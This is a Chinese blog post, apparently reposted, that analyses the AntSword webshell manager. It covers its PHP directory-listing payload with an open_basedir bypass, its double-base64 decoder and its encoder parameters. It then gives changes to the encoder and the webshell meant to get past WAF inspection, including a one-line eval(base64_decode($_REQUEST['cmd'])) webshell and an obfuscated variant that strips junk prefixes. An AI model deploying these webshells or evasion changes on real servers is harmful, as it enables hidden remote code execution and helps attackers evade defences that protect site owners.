当前位置:   article > 正文

蚁剑工作机制分析与改造

蚁剑工作机制分析与改造

概述

总体从四个角度了解蚁剑工作机制

  1. 蚁剑发送的payload
  2. 解码器
  3. 编码器
  4. 请求包中的所有参数

蚁剑发送的payload

随机数字作为分界符,

发送前蚁剑客户端已生成

接收响应包时自动剔除

作用 : 防waf定位解码

主要函数:

  • asenc()

$out是输出,传递$out是为了给输出编码,通过return传递给asoutput()函数

  • asoutput()

通过$output = ob_get_contents(), 从缓冲区获取payload执行后的数据,经过asenc()编码然后输出

什么时候数据跑到缓冲区?

53行,ob_start();,打开缓冲区

77行:echo $M . $L;,将payload执行后的数据输出至缓冲区

该payload是目录获取payload,最后的$M.$L便是payload的执行结果

以下是payload代码

  1. <?php
  2. @ini_set("display_errors", "0");
  3. @set_time_limit(0);
  4. $opdir = @ini_get("open_basedir");
  5. if ($opdir) {
  6. $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
  7. $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
  8. @array_push($oparr, $ocwd, sys_get_temp_dir());
  9. foreach ($oparr as $item) {
  10. if (!@is_writable($item)) {
  11. continue;
  12. }
  13. $tmdir = $item . "/.bb5712d7460";
  14. @mkdir($tmdir);
  15. if (!@file_exists($tmdir)) {
  16. continue;
  17. }
  18. $tmdir = realpath($tmdir);
  19. @chdir($tmdir);
  20. @ini_set("open_basedir", "..");
  21. $cntarr = @preg_split("/\\\\|\//", $tmdir);
  22. for ($i = 0; $i < sizeof($cntarr); $i++) {
  23. @chdir("..");
  24. }
  25. @ini_set("open_basedir", " /");
  26. @rmdir($tmdir);
  27. break;
  28. }
  29. }
  30. function asenc($out)
  31. {
  32. return $out;
  33. }
  34. function asoutput()
  35. {
  36. $output = ob_get_contents();
  37. ob_end_clean();
  38. echo "b031" . "2f345";
  39. echo @asenc($output);
  40. echo "594e" . "e92a";
  41. }
  42. ob_start();
  43. try {
  44. $D = base64_decode(substr($_POST["e17bb804eeb883"], 2));
  45. $F = @opendir($D);
  46. if ($F == NULL) {
  47. echo("ERROR:// Path Not Found Or No Permission!");
  48. } else {
  49. $M = NULL;
  50. $L = NULL;
  51. while ($N = @readdir($F)) {
  52. $P = $D . $N;
  53. $T = @date("Y-m-d H:i:s", @filemtime($P));
  54. @$E = substr(base_convert(@fileperms($P), 10, 8), -4);
  55. $R = " " . $T . " " . @filesize($P) . " " . $E . " ";
  56. if (@is_dir($P))
  57. $M .= $N . " /" . $R;
  58. else
  59. $L .= $N . $R;
  60. }
  61. echo $M . $L;
  62. @closedir($F);
  63. }
  64. } catch (Exception $e) {
  65. echo "ERROR://" . $e->getMessage();
  66. }
  67. asoutput();
  68. die();

解码器

双base64关键部分源码:

  1. asoutput: () => {
  2. return `function asenc($out){
  3. return @base64_encode(base64_encode($out));
  4. }
  5. `.replace(/\n\s+/g, '');
  6. },
  7. decode_buff: (data, ext={}) => {
  8. var fir_de_data = Buffer.from(data.toString(), 'base64');
  9. var sec_de_data = Buffer.from(fir_de_data.toString(),'base64');
  10. return sec_de_data;

要注意的问题:

data中包含经过编码后的数据,

最终要解码并写入buffer对象中

tostring是让被解码后的二进制数据以字符串的形式表示好进行二次处理

两个重要函数:

  • asoutput
  • decode_buff

编码器

无论什么加密方式,都要传输两个变量给shell

  • data['rondomID']
  • data['pwd']

data['rondomID']中存储的是payload,需要对它进行编码或加密

data['pwd']中存储的是解密方法

也就是说,webshell中不含任何解密方法,加密payload和解密函数,都靠蚁剑将两者打包成参数进行发送

所以,如果要简单修改成双base64,主要修改这两个参数的值

请求包中的所有参数

并非所有参数都经过加密

比如传payload之前传的包含解密方法参数$_POST['cmd']

该步骤,只能webshell配合,也就是在webshell中把解码方法写上

蚁剑又是发送加密payload又是发送包含明文解密函数的参数,如果再对该参数进行加密,只有webshell完成该解密工作了

可采用的方法思路:

  • 添加随机前缀后缀,模仿蚁剑返回包机制
  • 进行编码或加密(冰蝎的AES加密,直接把密钥写webshell代码上,两个风险,1.密钥固定导致固定步骤经过加密的payload的密文都是一样的,2.密钥太容易泄露)

上代码

这样,不仅payload进行了处理,cmd参数也进行了处理,效果图如下:

成果:$cmd参数成功加密,webshell成功处理返回.

但对于的,webshell要加个base64解密

<?php @eval(base64_decode($_REQUEST['cmd'])); ?>

或者,你可以采用添加随机前缀,就像经过解码器处理的返回包中一样.

要实现这个,需要对编码器和webshell进行小修改

  1. <?php
  2. $st = $_REQUEST['cmd'];
  3. $sy = str_replace('npbsgsb','',$st);
  4. $su = str_replace('xnzydsb,wndsg','',$sy);
  5. @eval(base64_decode($su));
  6. ?>

效果图如下:

参考链接:

蚁剑自定义编码器和解码器来bypass waf - darkless

WAF拦了蚁剑发送的其它参数时怎么操作

如果不了解基本的给蚁剑设置代理,改useragent,referer等字段,蚁剑自带编码解码器分析,可参考:

对蚁剑的相关改造及分析-安全客 - 安全资讯平台

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/452934
推荐阅读
相关标签
  

闽ICP备14008679号